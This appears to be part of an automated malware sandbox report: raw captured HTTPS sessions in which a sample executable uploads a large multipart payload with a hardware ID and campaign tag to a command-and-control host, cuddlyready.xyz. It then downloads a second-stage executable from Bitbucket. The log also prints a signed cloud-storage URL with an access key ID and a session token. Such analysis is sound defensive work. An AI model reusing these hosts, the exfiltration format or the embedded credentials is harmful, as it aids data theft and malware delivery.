                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                        vary: accept-encoding
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DPsGZlad7TXJegQWb%2FWGEC6M2LdDQVqLX33m0w9K7%2FuENltG5%2BYHK4U%2BnXXxBNc9gUUxFpHzawMEL2mXvdLJfDQHu1BHF%2BOJD1SxGAkrpt4jmMkZ18UMAEDjG9csxndN5b0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 8f66953689de4232-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1623&min_rtt=1623&rtt_var=610&sent=7&recv=8&lost=0&retrans=0&sent_bytes=2836&recv_bytes=2079&delivery_rate=1793611&cwnd=214&unsent_bytes=0&cid=a1d7c046cb66f195&ts=981&x=0"
                                                                                                                                                        2024-12-23 07:19:21 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                                                        2024-12-23 07:19:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 0


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        6192.168.2.749747104.21.32.964437624C:\Users\user\Desktop\LP4a6BowQN.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-23 07:19:23 UTC272OUTPOST /api HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: multipart/form-data; boundary=FDXL9U82
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                        Content-Length: 550856
                                                                                                                                                        Host: cuddlyready.xyz
                                                                                                                                                        2024-12-23 07:19:23 UTC15331OUTData Raw: 2d 2d 46 44 58 4c 39 55 38 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 38 36 32 33 34 45 33 45 38 37 46 35 45 35 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 46 44 58 4c 39 55 38 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 46 44 58 4c 39 55 38 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 46 44 58 4c 39 55 38 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69
                                                                                                                                                        Data Ascii: --FDXL9U82Content-Disposition: form-data; name="hwid"A86234E3E87F5E5CAC8923850305D13E--FDXL9U82Content-Disposition: form-data; name="pid"1--FDXL9U82Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--FDXL9U82Content-Di
                                                                                                                                                        2024-12-23 07:19:23 UTC15331OUTData Raw: 11 89 25 cd a9 37 8b c0 67 0f d5 00 19 80 03 93 bd 48 f6 86 df 50 f0 ae 84 d5 1b 7a 79 08 4a 7d 54 f8 13 f5 27 5b 0d c1 6d a6 1b 39 82 f3 ef 12 35 31 71 88 ad f7 42 c9 a7 99 28 92 6b 97 e2 11 c6 43 5a dd 18 b2 3e 9d 11 46 46 87 4f 96 8d 61 56 cd 1a 14 a9 c4 e1 a1 ba 81 a4 31 66 42 5b 02 c7 33 ed ca 82 83 29 9d 9f a3 83 4c 14 a6 e8 a2 f8 a1 ef e8 68 d1 7b 46 db 17 51 30 0d 1a 5b dc 2e 4a dd 41 4d ab 0f 39 2a 40 78 07 12 03 f7 f0 a0 6d f4 f4 bf c6 14 5d 9c 0f 1f 95 06 5d f3 da c0 4e 5b cf 19 d1 30 89 12 29 5e 0a 00 91 fd b4 3f 7c 37 49 c7 a2 28 25 d5 c4 48 15 7b c6 3c 4b 84 3a bd aa c4 e4 45 eb 90 3b e8 60 1c e2 09 44 31 a5 17 1a 25 5f 2e a0 65 7f 4c a2 e1 bf 4e a8 72 da 54 b3 78 7c 2d e6 63 b0 76 69 93 0f 53 bf 45 f1 fd 19 07 5d b0 20 dd 9d c1 88 b9 fc 0f
                                                                                                                                                        Data Ascii: %7gHPzyJ}T'[m951qB(kCZ>FFOaV1fB[3)Lh{FQ0[.JAM9*@xm]]N[0)^?|7I(%H{<K:E;`D1%_.eLNrTx|-cviSE]
                                                                                                                                                        2024-12-23 07:19:23 UTC15331OUTData Raw: 13 89 56 2c 73 9d a2 63 0b eb 88 2e 22 cc 9e 1f f7 af 2f bd 95 5a 56 b4 66 90 7b 8f 2f e2 dc c1 60 bb 73 4a 90 90 80 cc 70 27 35 32 f4 c2 97 b9 42 44 74 06 1a 05 81 b2 33 7b f3 34 70 04 21 92 1b 46 4a d8 59 82 aa 07 e7 d9 00 a9 70 f8 ed b2 5b 8e af 80 51 56 ef 19 05 0d 85 8b e7 86 ce bc f1 5a de be 72 6a b8 f4 c1 4c d9 0d 33 fd 81 bc 97 9c b0 9d 96 b9 3b 08 dd fb d9 6f 90 73 7f af 6f 3d fe 1c c6 e4 ee 49 d4 e8 27 6f 2e ac 9c c3 01 86 cb 6b 6e 2d a3 b9 75 7a 28 b0 dc 68 b6 14 d5 44 25 0d 33 10 cc 83 3d fe bc 3a 74 e8 97 ab 51 9a 7d 5f 40 a8 e3 40 8b d8 f3 d1 b6 ba e8 ef 42 c9 33 55 fa 09 7c 6f b4 2c 33 aa ff 45 87 5f d5 74 74 df f8 2e 1d ba 5e ae 8b 75 55 28 8e e4 73 64 56 46 bf 5f b3 72 e6 be 3a ab 31 86 7b ef 5e 13 71 27 7f 3c 5c b9 6d 08 83 7a 0e 96 c0
                                                                                                                                                        Data Ascii: V,sc."/ZVf{/`sJp'52BDt3{4p!FJYp[QVZrjL3;oso=I'o.kn-uz(hD%3=:tQ}_@@B3U|o,3E_tt.^uU(sdVF_r:1{^q'<\mz
                                                                                                                                                        2024-12-23 07:19:23 UTC15331OUTData Raw: 65 03 8a ce 7d ee 0c f1 d3 01 e9 70 a4 b9 1f cb a6 31 23 0d 83 cb 94 1b 8f b6 ef cb 99 33 ca 1d b2 ee bd 6a 18 c3 79 b9 57 dc f4 28 76 a4 b1 24 74 6a b3 80 48 4c 24 9a 1b d2 c9 b6 7d 19 b9 f4 6b 73 06 b9 cb 12 65 cd bb 1f 76 c5 22 5e 9b eb d7 62 c3 ce 3b ea 01 12 66 57 e2 d3 4c 82 95 67 14 46 9d 67 3a e7 64 6e e0 52 9f b6 40 57 76 a9 1a 52 93 f8 5c bf e9 b7 ff e8 bc 31 97 a6 83 3b 26 ab d7 0e f4 54 aa e2 6b ab 7d 68 e0 5e d2 c9 e2 d5 60 c3 5d 45 29 52 ed 9a 57 cd a1 3e 88 50 23 61 86 4b 43 30 9e 37 86 7b b3 b8 b3 19 83 39 df 3e 71 b3 09 db d8 98 87 a2 63 5a bf e7 2d f7 84 95 5e f4 de f6 49 53 16 ff f8 a1 6a f3 a6 af f8 58 da 43 48 bf 74 db f3 74 fa 53 23 3d b8 e2 12 f2 e9 9e ef 8a 38 e6 ea 49 d8 4d f7 5c e8 7f e1 68 d1 b7 c9 f6 ac f3 2d 1d d0 1a cf cb 11
                                                                                                                                                        Data Ascii: e}p1#3jyW(v$tjHL$}ksev"^b;fWLgFg:dnR@WvR\1;&Tk}h^`]E)RW>P#aKC07{9>qcZ-^ISjXCHttS#=8IM\h-
                                                                                                                                                        2024-12-23 07:19:23 UTC15331OUTData Raw: 44 bb cd 7b cd bc 9f 31 67 bb bf 9e 3e f9 4a 1c a4 7c 1a e8 57 a1 94 6f ec a1 eb 3f 0a 74 f7 6c 59 36 28 1c f8 30 d4 a3 23 7b 66 20 b0 3f e4 f6 61 1e 0c f7 e6 51 c9 99 b5 84 04 8e 44 6a be fc ae 5d 5c 60 8f 12 86 a1 b0 32 7d 90 ad aa 46 75 78 31 5f a5 fb 8c 27 29 f5 eb e3 ad 8c 7d 4e f8 fc 84 fc f8 af b2 84 05 c9 f9 92 da fe 5d fc bf e4 63 02 e9 86 ac d8 fa ad 39 1f e2 c3 85 c4 78 a3 1a 23 0f 74 47 57 5e ca bc 8b 0c 92 c0 9e fb 92 56 63 a0 2b 95 d8 6c 60 3b 53 fd 2c 34 19 8d c4 35 0f fb 37 16 99 60 d2 f3 37 c2 cd e4 42 e5 d6 b8 b9 26 d7 0b be ca 05 dd 3a fb 3c c2 43 af eb c3 6b 38 81 ae dc fe ce 6d a4 02 e3 4e 58 5b 3f 95 df 70 29 f8 4e 48 fa dc f5 36 95 57 37 0d ec 04 e5 de 7c 4f 68 3e 9e 8c f6 2c a4 a8 8e 1e 8e 50 cd 4a 88 ab 10 1d 83 56 04 d7 d4 e6 be
                                                                                                                                                        Data Ascii: D{1g>J|Wo?tlY6(0#{f ?aQDj]\`2}Fux1_')}N]c9x#tGW^Vc+l`;S,457`7B&:<Ck8mNX[?p)NH6W7|Oh>,PJV
                                                                                                                                                        2024-12-23 07:19:23 UTC15331OUTData Raw: e9 db 8d cf e3 29 92 8e b3 7c e0 60 e3 f4 9f 94 23 44 24 5b 23 b0 24 1d fd 7b fe 33 81 45 80 b9 cb ce 41 ff 42 7a 42 62 5e 0e 23 9c da 52 ba e5 53 81 17 ba 98 b2 2a 76 1f 53 96 b6 fc ac a1 94 24 27 43 9b e2 3a bf 3f bd 14 12 9c e6 33 34 90 e2 f0 85 1a 69 a2 55 b9 fc 45 67 14 85 f7 ac b7 05 f2 40 43 42 a3 3a 76 3b 53 7e 3c 51 a5 15 e7 31 70 b9 d5 3a c2 e7 32 2b 9f 4d dc 7c 87 75 21 0f db 85 de 35 81 d2 83 8b 72 0d 6d 51 46 3b ea 22 ea 1a 84 c2 68 90 83 aa 74 1b 96 04 8e 72 8c fc 53 e5 6a f5 0b 21 0b 7c fa b9 ec e8 63 a5 db 60 89 b1 3e 22 9b 2b 7f 20 9b 94 68 4e d6 e0 5d b6 37 fa 5a 7f 8f a9 5d 3c 3e 52 aa c8 f2 6e ae 10 1f ad 96 70 1d 92 bb 0a a5 37 73 b7 bb 18 e9 c5 7c b4 47 51 fa 5c 24 69 d0 c4 d9 68 39 26 98 18 cb 54 c2 30 54 7d 67 a0 b1 0c ac f8 b4 0d
                                                                                                                                                        Data Ascii: )|`#D$[#${3EABzBb^#RS*vS$'C:?34iUEg@CB:v;S~<Q1p:2+M|u!5rmQF;"htrSj!|c`>"+ hN]7Z]<>Rnp7s|GQ\$ih9&T0T}g
                                                                                                                                                        2024-12-23 07:19:23 UTC15331OUTData Raw: 24 29 80 d8 b6 8a b9 9c a9 b7 ae dc 0f 48 ae 4b c5 8f a3 14 2f d0 f7 5d c7 74 e3 5e 8c 7f f8 2b 68 e3 02 60 be 5d 88 28 df 1a df c8 13 f1 a1 9d 99 d6 0f f4 ec ce 30 de 19 ee dd b4 fa 2d 1f f3 a7 e0 08 66 e9 51 ae ff d8 95 0c 73 31 d7 9d ef a7 8b 35 c5 dd 1e 63 07 e2 20 e4 50 88 d4 dc 3f b7 4f 4a bd f4 25 60 90 23 37 ec f5 20 47 dd f9 56 42 ed c9 f4 54 11 33 41 56 e1 c8 c4 84 80 9a 5e 6b 12 ca fe 0e d7 fa c4 a1 8a ff 33 21 72 ab 33 de 15 31 ba 0b 7a 2a 77 7b 08 af c4 b1 69 97 7e e3 0a a6 da 5f 74 68 da 7c 6b 37 bd 0f 51 c2 b2 8b 5c 41 b3 95 bf 64 d3 48 36 e8 88 26 a0 61 14 f9 9c 22 50 ff 2f 08 63 fd eb 48 8c cf 2f 69 7f 97 c1 76 c3 05 fe 10 a9 fd 04 ab a7 b1 b2 c8 32 2f 00 4b 00 fc af f9 ce 66 cd 09 30 1d 41 08 42 b4 dd 9f 22 29 02 21 1d 01 47 a0 17 b7 70
                                                                                                                                                        Data Ascii: $)HK/]t^+h`](0-fQs15c P?OJ%`#7 GVBT3AV^k3!r31z*w{i~_th|k7Q\AdH6&a"P/cH/iv2/Kf0AB")!Gp
                                                                                                                                                        2024-12-23 07:19:23 UTC15331OUTData Raw: 1d 69 40 10 1e 6e 6d 2f 71 99 37 27 b4 7a a5 bc ed 36 a7 86 0a 17 c5 44 e7 4d de 7f 4f 8a 98 75 d1 65 9d 26 73 42 b9 e4 92 08 66 61 f1 ad c9 09 fe 10 cc e8 e3 35 3d e4 cf a0 8f ed da a7 22 3a eb 75 f3 46 a9 49 5e df 62 ca fa e3 e7 b1 6b 76 da 6c 2c f3 83 7c c3 b1 98 77 ae 96 b3 ba e6 a6 68 f2 73 4e c6 bb 6d 51 e3 8d 6c aa d8 1a 1c 00 07 f1 b2 03 e2 87 be 15 dc 94 50 dc 08 c7 20 19 31 e5 a9 34 b7 b9 34 47 84 d3 e5 9d 69 fb 09 6d a2 1f 02 50 9d e5 5a 96 5a 06 1c 55 03 c4 1f 44 83 2c c1 84 66 62 6e ac b1 86 6d 23 88 02 e5 20 f0 6a c2 f5 31 bf 67 a2 e1 8d bb 04 1f fe 9e 4a d8 28 cb 4b d8 3a 6e c7 d8 bc 9c 29 eb 11 c9 4e 9a c8 a6 79 d5 47 aa b1 13 f6 d3 50 28 ed 6f 54 38 ea 0d 69 77 63 98 fe 52 f2 37 aa 3a bb a3 b9 a8 f0 e5 63 ca 81 b2 fc 1d 12 5d c6 c7 62 ba
                                                                                                                                                        Data Ascii: i@nm/q7'z6DMOue&sBfa5=":uFI^bkvl,|whsNmQlP 144GimPZZUD,fbnm# j1gJ(K:n)NyGP(oT8iwcR7:c]b
                                                                                                                                                        2024-12-23 07:19:23 UTC15331OUTData Raw: 0c 1b 57 71 01 43 4f b0 78 50 c8 29 1d dd 21 78 c0 8d 12 7e f3 91 c7 07 a7 d8 85 6d 78 11 85 30 47 7e 96 99 43 7d 69 f0 d4 2d d4 86 aa d1 b6 bf d0 06 24 72 23 c9 23 0c 0d 62 55 78 22 3a 43 cc ea da 69 ab 4a f5 cb 97 a2 94 54 aa 49 2b d0 2f b3 f4 99 dc 7b ae 33 22 5d c1 c4 b8 88 d8 b8 d8 3b 87 d5 e4 9d 62 c5 66 25 97 10 82 53 96 c5 f1 1e 83 01 19 d9 b8 1d cc 4e 9d f4 7a 9d 88 b3 97 a8 fd 88 82 f6 7e 9c b7 07 df f4 cf 37 2b f4 1d cb 5a c9 d6 66 86 82 b6 93 d8 69 97 d7 b8 9d 55 6c ec b2 c4 df 77 cb 16 6b 6f 0f 89 b7 7a c4 25 b0 76 8f 2a 16 0a 0e 87 b8 f3 3e 9b 15 f0 17 cb c1 0f 6e 63 fa 8b 22 78 62 85 86 7f f9 ce cd 51 a2 ee 27 65 5a fe 43 4a 0a d1 e6 79 dd 1d c9 4e b3 e6 4b 62 3e a2 b7 ea 3e d5 62 d7 d5 97 79 92 98 e5 be 18 df 06 78 ec 97 c2 2b 83 33 73 f2
                                                                                                                                                        Data Ascii: WqCOxP)!x~mx0G~C}i-$r##bUx":CiJTI+/{3"];bf%SNz~7+ZfiUlwkoz%v*>nc"xbQ'eZCJyNKb>>byx+3s
                                                                                                                                                        2024-12-23 07:19:23 UTC15331OUTData Raw: 81 3f 7e 24 da 90 f4 f9 b0 ee fb c1 05 cd c4 d3 a3 25 59 8b 5a 8c c7 58 c4 1f f1 41 a7 86 5b d4 e5 be 23 17 9a ed 2f ef a7 a7 82 3a 45 2f 08 1e 7a 94 d0 2a 09 f4 2e 9c e2 03 8f e4 c3 0d f9 c1 ac c3 df ef a3 77 d0 bc f5 a8 27 0b 3c 21 d7 72 5a 7b 9b 6c c1 13 fe bc e2 a2 6d b8 d6 52 4c 08 12 f0 43 f9 3c 77 13 eb ef 7c 95 fd 7d 25 57 98 e6 36 04 08 41 98 f3 90 05 1a 3e c7 ae e7 90 2d 2d 23 74 ab b8 78 1a 4f 0f 8f 6e 94 e0 6c 1d 63 24 19 07 a6 f3 69 36 2a b4 ca 3c 4d 33 fc ea a8 48 ac 79 41 5f 7d e5 f6 ed e1 07 3e b6 5b 18 0b 02 fe 0d ec 5f 2c 57 75 fe 8f 01 94 dd 26 f0 e2 a9 cd cb 00 ee 14 68 d8 60 62 c8 db f0 6e 69 48 ab f8 ec 91 e7 31 a2 75 c6 78 25 1a f1 c4 27 dd db 8c 22 70 4b d1 5a 31 d8 cb 16 50 e2 47 14 61 a5 43 c1 0d 0a d0 86 18 56 1c 5c 57 4f cd b6
                                                                                                                                                        Data Ascii: ?~$%YZXA[#/:E/z*.w'<!rZ{lmRLC<w|}%W6A>--#txOnlc$i6*<M3HyA_}>[_,Wu&h`bniH1ux%'"pKZ1PGaCV\WO
                                                                                                                                                        2024-12-23 07:19:28 UTC1128INHTTP/1.1 200 OK
                                                                                                                                                        Date: Mon, 23 Dec 2024 07:19:28 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Set-Cookie: PHPSESSID=pt9vo2igdgokuefusggdodil8t; expires=Fri, 18 Apr 2025 01:06:04 GMT; Max-Age=9999999; path=/
                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                        vary: accept-encoding
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P49Urjn1%2Bsnln6WV4ioDspL1zcop%2F3HyihJN06SVsjMeZAI8D673asdUzl7LBxueEqXQEXtIq7RX5bwCJ1p5kUHfgr3aaUmIsICOVbYTk3crmhFMufSDVvx8NKYMI9iwp0E%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 8f669546fd11159b-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1605&min_rtt=1601&rtt_var=608&sent=332&recv=574&lost=0&retrans=0&sent_bytes=2835&recv_bytes=553326&delivery_rate=1788120&cwnd=32&unsent_bytes=0&cid=df2eafc3f9f9d920&ts=4691&x=0"


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        7192.168.2.749758104.21.32.964437624C:\Users\user\Desktop\LP4a6BowQN.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-23 07:19:29 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                        Content-Length: 88
                                                                                                                                                        Host: cuddlyready.xyz
                                                                                                                                                        2024-12-23 07:19:29 UTC88OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d 26 68 77 69 64 3d 41 38 36 32 33 34 45 33 45 38 37 46 35 45 35 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45
                                                                                                                                                        Data Ascii: act=get_message&ver=4.0&lid=LOGS11--LiveTraffic&j=&hwid=A86234E3E87F5E5CAC8923850305D13E
                                                                                                                                                        2024-12-23 07:19:30 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                        Date: Mon, 23 Dec 2024 07:19:30 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Set-Cookie: PHPSESSID=ahos70bhasobcoam7es51k8ijn; expires=Fri, 18 Apr 2025 01:06:09 GMT; Max-Age=9999999; path=/
                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                        vary: accept-encoding
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=akVs6JrIaqpHFr0qzvG0Em7bfIUZ18BJeM%2B4eJpxzdypUu%2BGWIf4ppihFF8BFB4FgSy6vUpyUT%2FQnKhNTmg%2BbLl0Sz%2FAsXHY%2Bn8qrrY4ZXnLUQWbmhhPccD3SnyH8CrBSBg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 8f66956cac520f3d-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1659&min_rtt=1646&rtt_var=643&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=987&delivery_rate=1666666&cwnd=131&unsent_bytes=0&cid=c7f7430c49d7302e&ts=774&x=0"
                                                                                                                                                        2024-12-23 07:19:30 UTC198INData Raw: 63 30 0d 0a 57 46 6d 6e 42 2b 32 65 43 45 45 41 4a 4d 6f 77 4e 46 52 32 51 52 30 63 66 54 6a 43 47 68 32 42 45 42 33 78 49 32 6d 42 53 46 59 44 49 6f 56 79 7a 36 51 71 4b 58 52 51 75 6b 4d 4f 43 46 6b 64 4d 6e 34 55 54 4b 42 76 66 75 70 31 61 64 39 4d 47 2b 59 55 65 54 55 67 79 57 4b 61 36 57 63 7a 61 31 65 36 55 56 63 78 52 33 4d 75 4c 30 77 4b 6e 6a 56 75 34 6e 35 35 72 51 77 4e 37 6a 38 34 4e 44 62 47 59 35 37 43 4a 77 64 76 56 71 64 52 51 43 41 66 4c 33 70 66 46 56 6d 77 63 32 6e 67 63 6e 47 55 44 51 7a 35 4c 58 52 30 65 38 46 7a 7a 36 51 34 62 53 4a 42 36 41 6f 46 4b 53 73 3d 0d 0a
                                                                                                                                                        Data Ascii: c0WFmnB+2eCEEAJMowNFR2QR0cfTjCGh2BEB3xI2mBSFYDIoVyz6QqKXRQukMOCFkdMn4UTKBvfup1ad9MG+YUeTUgyWKa6Wcza1e6UVcxR3MuL0wKnjVu4n55rQwN7j84NDbGY57CJwdvVqdRQCAfL3pfFVmwc2ngcnGUDQz5LXR0e8Fzz6Q4bSJB6AoFKSs=
                                                                                                                                                        2024-12-23 07:19:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 0


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        8192.168.2.749764185.166.143.494437624C:\Users\user\Desktop\LP4a6BowQN.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-23 07:19:32 UTC248OUTGET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                        Host: bitbucket.org
                                                                                                                                                        2024-12-23 07:19:32 UTC5939INHTTP/1.1 302 Found
                                                                                                                                                        Date: Mon, 23 Dec 2024 07:19:32 GMT
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        Server: AtlassianEdge
                                                                                                                                                        Location: https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNIFBW6TYB&Signature=PelXt66tJz%2FulrB0cB0%2BaL7%2Bi5E%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAgaCXVzLWVhc3QtMSJHMEUCIQD%2BsOmmZbJoeqQMRgcbUIKewsPYW2aBXNNdnqSZnOjDFwIgR8XEHN13jTNswyI0HHU0LSuyGD%2FTMiS45XjOxzfx2bUqsAII0P%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDKLERm7AyKJmGnsaryqEAiz2RQWxEcCBLMIfVp3H4PSzeOX5Dz20ShaLz%2BgE9TIlAJRJj3b2E09svKzFkLddqGwYqC2K%2FKIH%2B43EpJ156iF0t0YnErOxg3PyYWT2PSMugnEx4xgVbJpkrwOS%2BaXe%2FSsC4UOf%2F83UoqmwNPRhKyzztbcDpxLcWerZy9Q6aovVLfMedeL2%2BzfXvbpi8S9915xhF0Cpozy3i0jpnDfou%2FWMrbGZX8d8kbOTHT2AOnqFdwajWkRe0yZY7VqHnS4UnUUU2gtvmzbAh%2B9Byjxps3Oa32XIPpDohq%2Fsd63Twd%2FTpUBNqNyZ3%2BxCnHgqoVCvvdq8kFyXYiW9CTBL2KWz0BWyfxXEMIaYpLsGOp0BYb7jWXl2rvZ6kkWiTN4Lg4p1xTsXw8YInPWUnYT2zjLbcrffJNmSPBWt8S40YM7x5zFblDt5Ez5 [TRUNCATED]
                                                                                                                                                        Expires: Mon, 23 Dec 2024 07:19:32 GMT
                                                                                                                                                        Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                                                                                        X-Used-Mesh: False
                                                                                                                                                        Vary: Accept-Language, Origin
                                                                                                                                                        Content-Language: en
                                                                                                                                                        X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                                                                        X-Dc-Location: Micros-3
                                                                                                                                                        X-Served-By: 66c94ffc68ae
                                                                                                                                                        X-Version: c9b3998323c0
                                                                                                                                                        X-Static-Version: c9b3998323c0
                                                                                                                                                        X-Request-Count: 248
                                                                                                                                                        X-Render-Time: 0.05292677879333496
                                                                                                                                                        X-B3-Traceid: ecd3417aa53640c3a9959b3f7c78f82c
                                                                                                                                                        X-B3-Spanid: a7ea579411d4b7e8
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        Content-Security-Policy: connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net atlassianblog.wpengine.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.ne [TRUNCATED]
                                                                                                                                                        X-Usage-Quota-Remaining: 999105.459
                                                                                                                                                        X-Usage-Request-Cost: 909.53
                                                                                                                                                        X-Usage-User-Time: 0.025410
                                                                                                                                                        X-Usage-System-Time: 0.001876
                                                                                                                                                        X-Usage-Input-Ops: 0
                                                                                                                                                        X-Usage-Output-Ops: 0
                                                                                                                                                        Age: 0
                                                                                                                                                        X-Cache: MISS
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        X-Xss-Protection: 1; mode=block
                                                                                                                                                        Atl-Traceid: ecd3417aa53640c3a9959b3f7c78f82c
                                                                                                                                                        Atl-Request-Id: ecd3417a-a536-40c3-a995-9b3f7c78f82c
                                                                                                                                                        Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                                        Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                                                                                        Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                                                                                        Server-Timing: atl-edge;dur=163,atl-edge-internal;dur=4,atl-edge-upstream;dur=161,atl-edge-pop;desc="aws-eu-central-1"
                                                                                                                                                        Connection: close


